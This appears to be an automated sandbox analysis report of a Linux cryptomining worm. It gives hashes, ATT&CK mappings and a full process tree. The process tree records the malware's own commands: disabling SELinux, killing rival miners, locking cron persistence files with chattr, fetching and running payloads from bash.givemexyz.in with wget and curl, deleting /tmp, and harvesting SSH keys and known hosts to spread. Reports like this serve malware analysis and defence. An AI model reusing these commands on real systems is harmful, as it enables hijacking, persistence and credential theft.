ba2e2bda0794551b0d203c2b617a8b327baa68199e5d7dd22d8849a77fac1183

General

Target

1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
Size

11KB
MD5

1196d0a31402b04a32aa582ae6d2c15b
SHA1

5d6a8c0437bdf30079188283b0e60d063e649f27
SHA256

ba2e2bda0794551b0d203c2b617a8b327baa68199e5d7dd22d8849a77fac1183
SHA512

cb9e5c0b2a430bd2963b64e659cb2cb65f20d53888e6a188f9831a65c0dd568550439423ff2349c7100e09f45ba3b07e97688c1d9190b2bc1d7a595f310cb28a
SSDEEP

192:fQ6PgM8PvaA0Rj1veSS7MYtGRwcY3Pkfz216zPEDAzQSvmgVgIbc1H7vjjB4C1v6:fQ6PgM8PvaA0Rj1vy7fmjwMxzgX17j/s

Score

7^/10

persistence

Malware Config

Signatures

Executes dropped EXE 4 IoCs

Processes:

dbuseddbusedbashirccruner

ioc pid process

/tmp/dbused 949 dbused
/tmp/dbused 951 dbused
/tmp/bashirc 963 bashirc
/tmp/cruner 978 cruner
Attempts to change immutable files 5 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.

Processes:

chattrgrepgrepchattrchattr

pid process

851 chattr
856 grep
860 grep
879 chattr
1063 chattr

ioc	pid	process
/tmp/dbused	949	dbused
/tmp/dbused	951	dbused
/tmp/bashirc	963	bashirc
/tmp/cruner	978	cruner

pid	process
851	chattr
856	grep
860	grep
879	chattr
1063	chattr

Creates/modifies Cron job 1 TTPs 6 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

persistence

Scheduled Task/Job

T1053

Processes:

1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118

description	ioc	process
File opened for modification	/etc/cron.d/nginx	1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
File opened for modification	/var/spool/cron/root	1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
File opened for modification	/var/spool/cron/crontabs/root	1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
File opened for modification	/etc/cron.hourly/oanacroner1
File opened for modification	/etc/cron.d/root	1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
File opened for modification	/etc/cron.d/apache	1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118

Disables SELinux 9 IoCs
Disables SELinux security module.

Processes:

grepgrepgrepgrepsleepsleepsetenforcegrepgrep

pid process

775 grep
793 grep
811 grep
823 grep
980 sleep
1071 sleep
711 setenforce
769 grep
956 grep
Enumerates running processes
Discovers information about currently running processes on the system

pid	process
775	grep
793	grep
811	grep
823	grep
980	sleep
1071	sleep
711	setenforce
769	grep
956	grep

Reads CPU attributes 1 TTPs 19 IoCs

System Information Discovery

T1082

Processes:

killkillkillkillkillkillkillpskillpssysctlkillkillkillpskillkillkillkill

description	ioc	process
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	sysctl
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	kill

Enumerates kernel/hardware configuration 1 TTPs 3 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

Processes:

systemctlsystemctlsystemctl

description	ioc	process
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

pspssystemctlpsawkcurlkillkillawkxargsawk

description	ioc	process
File opened for reading	/proc/706/status	ps
File opened for reading	/proc/71/cmdline	ps
File opened for reading	/proc/82/cmdline	ps
File opened for reading	/proc/419/status	ps
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/4/stat	ps
File opened for reading	/proc/20/cmdline	ps
File opened for reading	/proc/self/fd
File opened for reading	/proc/36/stat	ps
File opened for reading	/proc/filesystems	ps
File opened for reading	/proc/9/stat	ps
File opened for reading	/proc/4/cmdline	ps
File opened for reading	/proc/175/cmdline	ps
File opened for reading	/proc/70/status	ps
File opened for reading	/proc/82/status	ps
File opened for reading	/proc/12/status	ps
File opened for reading	/proc/22/stat	ps
File opened for reading	/proc/70/status	ps
File opened for reading	/proc/250/status	ps
File opened for reading	/proc/110/cmdline	ps
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/23/status	ps
File opened for reading	/proc/234/stat	ps
File opened for reading	/proc/679/cmdline	ps
File opened for reading	/proc/338/cmdline	ps
File opened for reading	/proc/12/status	ps
File opened for reading	/proc/6/stat	ps
File opened for reading	/proc/17/stat	ps
File opened for reading	/proc/859/stat	ps
File opened for reading	/proc/4/cmdline	ps
File opened for reading	/proc/70/cmdline	ps
File opened for reading	/proc/250/stat	ps
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/2/status	ps
File opened for reading	/proc/20/stat	ps
File opened for reading	/proc/334/stat	ps
File opened for reading	/proc/386/stat	ps
File opened for reading	/proc/8/status	ps
File opened for reading	/proc/670/stat	ps
File opened for reading	/proc/684/stat	ps
File opened for reading	/proc/684/cmdline	ps
File opened for reading	/proc/filesystems	kill
File opened for reading	/proc/filesystems	kill
File opened for reading	/proc/10/status	ps
File opened for reading	/proc/self/stat	ps
File opened for reading	/proc/15/stat	ps
File opened for reading	/proc/71/status	ps
File opened for reading	/proc/11/stat	ps
File opened for reading	/proc/11/cmdline	ps
File opened for reading	/proc/76/status	ps
File opened for reading	/proc/75/cmdline	ps
File opened for reading	/proc/77/cmdline	ps
File opened for reading	/proc/250/stat	ps
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/self/fd	xargs
File opened for reading	/proc/14/status	ps
File opened for reading	/proc/37/stat	ps
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/684/stat	ps
File opened for reading	/proc/975/status	ps
File opened for reading	/proc/sys/kernel/osrelease	ps
File opened for reading	/proc/74/status	ps
File opened for reading	/proc/706/status	ps
File opened for reading	/proc/12/stat	ps

Writes file to tmp directory 3 IoCs

Malware often drops required files in the /tmp directory.

Processes:

1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118

description	ioc
File opened for modification	/tmp/dbused
File opened for modification	/tmp/bashirc
File opened for modification	/tmp/cruner	1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118

/tmp/1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
/tmp/1196d0a31402b04a32aa582ae6d2c15b_JaffaCakes118
1⤵
- Creates/modifies Cron job
- Writes file to tmp directory
PID:708

/usr/sbin/setenforce
setenforce 0
2⤵
- Disables SELinux
PID:711

/bin/grep
grep -c processor /proc/cpuinfo
2⤵
PID:716

/sbin/sysctl
sysctl -w "vm.nr_hugepages=3"
2⤵
- Reads CPU attributes
PID:718

/bin/grep
grep :3333
2⤵
PID:722

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:723

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:724

/usr/bin/xargs
xargs kill -9
2⤵
PID:725

/sbin/kill
kill -9
3⤵
PID:728

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:728

/bin/grep
grep :4444
2⤵
PID:735

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:736

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:737

/usr/bin/xargs
xargs kill -9
2⤵
PID:738

/sbin/kill
kill -9
3⤵
PID:741

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:741

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:750

/usr/bin/xargs
xargs kill -9
2⤵
PID:751

/sbin/kill
kill -9
3⤵
PID:753

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:753

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:749

/bin/grep
grep :5555
2⤵
PID:748

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:759

/usr/bin/xargs
xargs kill -9
2⤵
PID:760

/sbin/kill
kill -9
3⤵
PID:761

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:761

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:758

/bin/grep
grep :7777
2⤵
PID:757

/bin/grep
grep :14444
2⤵
PID:763

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:764

/usr/bin/xargs
xargs kill -9
2⤵
PID:766

/sbin/kill
kill -9
3⤵
PID:767

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:767

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:765

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:770

/bin/grep
grep :5790
2⤵
- Disables SELinux
PID:769

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:771

/usr/bin/xargs
xargs kill -9
2⤵
PID:772

/sbin/kill
kill -9
3⤵
PID:773

/bin/kill
kill -9
3⤵
- Reads CPU attributes
- Reads runtime system information
PID:773

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:777

/usr/bin/awk
awk "{print \$7}"
2⤵
- Reads runtime system information
PID:776

/bin/grep
grep :45700
2⤵
- Disables SELinux
PID:775

/usr/bin/xargs
xargs kill -9
2⤵
PID:778

/sbin/kill
kill -9
3⤵
PID:779

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:779

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:783

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:782

/bin/grep
grep :2222
2⤵
PID:781

/usr/bin/xargs
xargs kill -9
2⤵
PID:784

/sbin/kill
kill -9
3⤵
PID:785

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:785

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:789

/bin/grep
grep :9999
2⤵
PID:787

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:788

/usr/bin/xargs
xargs kill -9
2⤵
PID:790

/sbin/kill
kill -9
3⤵
PID:791

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:791

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:795

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:794

/bin/grep
grep :20580
2⤵
- Disables SELinux
PID:793

/usr/bin/xargs
xargs kill -9
2⤵
PID:796

/sbin/kill
kill -9
3⤵
PID:797

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:797

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:803

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:802

/bin/grep
grep :13531
2⤵
PID:801

/usr/bin/xargs
xargs kill -9
2⤵
- Reads runtime system information
PID:804

/sbin/kill
kill -9
3⤵
PID:806

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:806

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:812

/bin/grep
grep 23.94.24.12:8080
2⤵
- Disables SELinux
PID:811

/usr/bin/xargs
xargs kill -9
2⤵
PID:815

/sbin/kill
kill -9
3⤵
PID:817

/bin/kill
kill -9
3⤵
- Reads CPU attributes
- Reads runtime system information
PID:817

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:814

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:825

/usr/bin/xargs
xargs kill -9
2⤵
PID:826

/sbin/kill
kill -9
3⤵
PID:827

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:827

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:824

/bin/grep
grep 134.122.17.13:8080
2⤵
- Disables SELinux
PID:823

/bin/sed
sed -e "s/\\/.*//g"
2⤵
PID:835

/usr/bin/awk
awk "{print \$7}"
2⤵
PID:834

/bin/grep
grep 107.189.11.170:443
2⤵
PID:833

/usr/bin/xargs
xargs kill -9
2⤵
PID:836

/sbin/kill
kill -9
3⤵
PID:837

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:837

/usr/bin/chattr
chattr -i -a /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down
2⤵
- Attempts to change immutable files
PID:851

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:855

/bin/grep
grep -i "[a]liyun"
2⤵
- Attempts to change immutable files
PID:856

/bin/grep
grep -i "[y]unjing"
2⤵
- Attempts to change immutable files
PID:860

/bin/ps
ps aux
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:859

/bin/sleep
sleep 1
2⤵
PID:861

/usr/bin/chattr
chattr -ai /tmp/dbused
2⤵
- Attempts to change immutable files
PID:879

/bin/mkdir
mkdir -p /var/spool/cron/crontabs
2⤵
PID:931

/bin/mkdir
mkdir -p /etc/cron.hourly
2⤵
PID:932

/bin/chmod
chmod 755 /etc/cron.hourly/oanacroner1
2⤵
PID:934

/bin/uname
uname -m
2⤵
PID:945

/usr/bin/wget
wget -q -O - http://bash.givemexyz.in/mips
2⤵
PID:946

/bin/chmod
chmod +x /tmp/dbused
2⤵
PID:947

/bin/chmod
chmod +x /tmp/dbused
2⤵
PID:948

/tmp/dbused
/tmp/dbused -c
2⤵
- Executes dropped EXE
PID:949

/tmp/dbused
/tmp/dbused -pwn
2⤵
- Executes dropped EXE
PID:951

/bin/sleep
sleep 5
2⤵
PID:953

/bin/uname
uname -m
2⤵
PID:959

/usr/bin/wget
wget -q -O - http://bash.givemexyz.in/bashirc.mips
2⤵
PID:960

/bin/chmod
chmod +x /tmp/bashirc
2⤵
PID:961

/bin/chmod
chmod 777 /tmp/bashirc
2⤵
PID:962

/tmp/bashirc
/tmp/bashirc
2⤵
- Executes dropped EXE
PID:963

/bin/systemctl
systemctl is-active cron
2⤵
- Enumerates kernel/hardware configuration
PID:965

/bin/systemctl
systemctl is-active crond
2⤵
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:966

/bin/systemctl
systemctl is-active atd
2⤵
- Enumerates kernel/hardware configuration
PID:967

/usr/bin/whoami
whoami
2⤵
PID:968

/bin/grep
grep -v grep
2⤵
PID:972

/bin/grep
grep cruner
2⤵
PID:973

/bin/ps
ps auxf
2⤵
- Reads CPU attributes
- Reads runtime system information
PID:971

/usr/bin/awk
awk "{print \$2}"
2⤵
PID:974

/usr/bin/xargs
xargs kill -9
2⤵
PID:975

/sbin/kill
kill -9
3⤵
PID:976

/bin/kill
kill -9
3⤵
- Reads CPU attributes
PID:976

/bin/chmod
chmod 777 /tmp/cruner
2⤵
PID:977

/bin/sleep
sleep 15
2⤵
PID:979

/usr/bin/nohup
nohup /tmp/cruner
2⤵
PID:978

/tmp/cruner
/tmp/cruner
2⤵
- Executes dropped EXE
PID:978

/bin/sh
/bin/sh /tmp/cruner
2⤵
PID:978

/bin/sleep
sleep 60
3⤵
- Disables SELinux
PID:980

/bin/bash
bash -sh
3⤵
PID:1065

/bin/bash
bash /tmp/xms
3⤵
PID:1068

/tmp/xms
/tmp/xms
3⤵
PID:1069

/bin/rm
rm -rf /tmp
3⤵
PID:1070

/bin/sleep
sleep 60
3⤵
- Disables SELinux
PID:1071

/bin/rm
rm -rf /tmp/cruner
2⤵
PID:993

/bin/grep
grep -q "http://bash.givemexyz.in\\|104.244.75.159"
2⤵
PID:997

/usr/bin/crontab
crontab -l
2⤵
PID:996

/bin/rm
rm -rf /tmp/2start.jpg
2⤵
PID:1061

/bin/rm
rm -rf /tmp/xmi
2⤵
PID:1062

/usr/bin/chattr
chattr +ai -V /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down
2⤵
- Attempts to change immutable files
PID:1063

/usr/bin/sort
sort -R
1⤵
PID:844

/usr/bin/head
head -n1
1⤵
PID:845

/usr/bin/seq
seq 0 255
1⤵
PID:843

/usr/bin/seq
seq 0 255
1⤵
PID:847

/usr/bin/sort
sort -R
1⤵
PID:848

/usr/bin/head
head -n1
1⤵
PID:849

/sbin/ip
ip a
1⤵
PID:882

/bin/grep
grep "BROADCAST\\|inet"
1⤵
PID:883

/bin/grep
grep -oP "inet\\s+\\K\\d{1,3}\\.\\d{1,3}"
1⤵
PID:884

/bin/grep
grep -v 127
1⤵
PID:885

/bin/grep
grep -v inet6
1⤵
PID:886

/bin/grep
grep -v 255
1⤵
PID:887

/usr/bin/head
head -n1
1⤵
PID:888

/bin/grep
grep "bytes of data"
1⤵
PID:891

/bin/ping
ping -c 1 pool.supportxmr.com
1⤵
PID:890

/usr/bin/wc
wc -l
1⤵
PID:892

/bin/grep
grep "bytes of data"
1⤵
PID:926

/usr/bin/wc
wc -l
1⤵
PID:927

/bin/ping
ping -c 1 bash.givemexyz.in
1⤵
PID:925

/bin/grep
grep "212.114.52.24:8080\\|194.5.249.24:8080"
1⤵
PID:937

/bin/grep
grep "LISTEN\\|ESTABLISHED\\|TIME_WAIT"
1⤵
PID:938

/bin/grep
grep -v grep
1⤵
PID:939

/bin/grep
grep "212.114.52.24:8080\\|194.5.249.24:8080"
1⤵
PID:942

/bin/grep
grep ESTABLISHED
1⤵
PID:943

/bin/grep
grep -v grep
1⤵
PID:944

/bin/grep
grep 104.168.71.132:80
1⤵
- Disables SELinux
PID:956

/bin/grep
grep ESTABLISHED
1⤵
PID:957

/bin/grep
grep -v grep
1⤵
PID:958

/bin/grep
grep -vw pub
1⤵
PID:1006

/usr/bin/find
find /root/ /root /home -maxdepth 2 -name "id_rsa*"
1⤵
PID:1005

/bin/grep
grep IdentityFile
1⤵
PID:1009

/usr/bin/awk
awk -F IdentityFile "{print \$2 }"
1⤵
PID:1010

/bin/cat
cat /root/.ssh/config "/home/*/.ssh/config" /root/.ssh/config
1⤵
PID:1008

/usr/bin/find
find /root/ /root /home -maxdepth 3 -name "*.pem"
1⤵
PID:1012

/usr/bin/uniq
uniq
1⤵
PID:1013

/bin/grep
grep HostName
1⤵
PID:1016

/usr/bin/awk
awk -F HostName "{print \$2}"
1⤵
- Reads runtime system information
PID:1017

/bin/cat
cat /root/.ssh/config "/home/*/.ssh/config" /root/.ssh/config
1⤵
PID:1015

/bin/grep
grep -E "(ssh|scp)"
1⤵
PID:1022

/bin/grep
grep -oP "([0-9]{1,3}\\.){3}[0-9]{1,3}"
1⤵
PID:1023

/bin/cat
cat /root/.bash_history "/home/*/.bash_history" /root/.bash_history
1⤵
PID:1021

/bin/grep
grep -oP "([0-9]{1,3}\\.){3}[0-9]{1,3}"
1⤵
PID:1026

/usr/bin/uniq
uniq
1⤵
PID:1027

/bin/cat
cat "/root/*/.ssh/known_hosts" "/home/*/.ssh/known_hosts" /root/.ssh/known_hosts
1⤵
PID:1025

/usr/bin/find
find /root/ /root /home -maxdepth 2 -name "\\.ssh"
1⤵
PID:1029

/usr/bin/uniq
uniq
1⤵
PID:1030

/usr/bin/xargs
xargs find
1⤵
PID:1031

/sbin/find
find
2⤵
PID:1036

/bin/find
find
2⤵
PID:1036

/usr/sbin/find
find
2⤵
PID:1036

/usr/bin/find
find
2⤵
PID:1036

/usr/bin/awk
awk /id_rsa/
1⤵
- Reads runtime system information
PID:1032

/usr/bin/awk
awk -F/ "{print \$3}"
1⤵
PID:1033

/usr/bin/uniq
uniq
1⤵
PID:1034

/bin/grep
grep -v "\\.ssh"
1⤵
PID:1035

/usr/bin/tr
tr " " "\\n"
1⤵
PID:1039

/usr/bin/nl
nl
1⤵
PID:1040

/usr/bin/sort
sort -u -k2
1⤵
PID:1041

/usr/bin/sort
sort -n
1⤵
PID:1042

/usr/bin/cut
cut -f2-
1⤵
PID:1044

/usr/bin/nl
nl
1⤵
PID:1050

/usr/bin/tr
tr " " "\\n"
1⤵
PID:1049

/bin/grep
grep -vw 127.0.0.1
1⤵
PID:1048

/usr/bin/sort
sort -u -k2
1⤵
PID:1051

/usr/bin/sort
sort -n
1⤵
PID:1052

/usr/bin/cut
cut -f2-
1⤵
PID:1053

/usr/bin/tr
tr " " "\\n"
1⤵
PID:1056

/usr/bin/nl
nl
1⤵
PID:1057

/usr/bin/sort
sort -u -k2
1⤵
PID:1058

/usr/bin/sort
sort -n
1⤵
PID:1059

/usr/bin/cut
cut -f2-
1⤵
PID:1060

/usr/bin/curl
curl -fsSL http://bash.givemexyz.in/xms
1⤵
- Reads runtime system information
PID:1066

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

1

T1053

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/cron.d/apache
Filesize
284B

MD5
9e9f6a486d0ea5976184c95a2f52cd49

SHA1
e44fe455508309e8e21f9f33fffcc7eecca0de57

SHA256
4d63cb713eb9c5f6082e7eb63dd3811d0b6f1e5d35fa3589c201496b222d2337

SHA512
1af5c94549c6f06ce522ee026da795226d3566e4868816844e9a6c7e3ffb7edb8b3457ac3cfe5c23f17e21b66e8464c9f79decc866f37e862f5e750307d273b1

Download Submit
/etc/cron.d/nginx
Filesize
284B

MD5
69f8fe8920f737d807cfda8f9d2ff2dd

SHA1
df11f2d59edac589962a0178e50b6117d18a1933

SHA256
5ad7db249a177b46bcb4b5e36ae590fe154b33fec7924bdf61481d281d3c2b8e

SHA512
034bd9e34f0deb1d7656ae2c914a304a4efca6920de9d1082a845cdb2ec13c71d46bc0a025a975125169e46c31ac87b7a73f4dc5b8e999e4b24308219f3c2137

Download Submit
/etc/cron.d/root
Filesize
284B

MD5
ddb2c00af645c486a790ed6d180b8819

SHA1
4ff1fc702a6d0bbf4cca6be1b2f3ef4d492a9340

SHA256
8f05cba82e2eb4ced38eb907928abce67112ebced31d4622428ddadc2d7a1120

SHA512
1f29d87c3d78bd42706a7eeedc7557f0d0370436a14cd2279bffa2af58036e1a6350b935b08c8635a9193d3f76e9d76ff3a9c08bfada64ef74f914b3354677a4

Download Submit
/etc/cron.hourly/oanacroner1
Filesize
264B

MD5
5cc2369275d33b8007781d1024edca44

SHA1
3e977f6e183c114affa947b2a2a70f7159ccddcc

SHA256
4a123c1f9cb0b49e960603805f087bb73ad26ff72176eba5089ced91823c92fe

SHA512
94ecd7e71c2e1edd1b466154aa24f4715d53826e4dafd0fe65123d98f96a08cdd9793dbc5403a47a4a87549eb16c503424e9d799f954c3dc2191d2ac2777ea49

Download Submit
/tmp/cruner
Filesize
312B

MD5
a2ace111ba7b74d185b49324858ea66b

SHA1
264073c1cec4e3e0f0e68994e8e9603e2b15af5e

SHA256
e83e8403225c0780132b3841c7ee6d09a131076cd60131c082140d5b86dfd044

SHA512
d3edd18d880a7fe9226d4ebfddd6d1043041e278f22cd818cd82f9c4457de1a75a08055c6aa8ffbf3793b239d698a010460f84a4492bcee6daa4c50907be9af8

Download Submit
/var/spool/cron/crontabs/root
Filesize
277B

MD5
e3d993445d42ab3ed35d78335d8ae5a3

SHA1
515765b31ed7b7098c12b7baae361fc86f6903ca

SHA256
6a1c7caaf79b92073f63e1d84ce8bde50e85bfffe03a7f26d6d1264f685194bd

SHA512
006c013726d50d6f1de60c5ff63fcfd881d219f25e66f1011630772443e4a827ff2148cda34eac6f66cb01256edf0f875815bb13836b3b942930cb1be7ca766f

Download Submit
/var/spool/cron/root
Filesize
280B

MD5
3abb4bc980da82bb669c1640539c5316

SHA1
be90d689bd325d72f544ab87eed84871a0130f3d

SHA256
6b0977f4e9b0023b95cb213ecfd85870db7617cb9db493a6126daf11ace4a71b

SHA512
ab1b09cf8751758ca9fc323d6ce21d4bf34267486b96e41d256a9983df23694a73e73c5b5e245a78055471db0f48e4cea4a9e26f8dbf73924fcc4649f59963ff

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads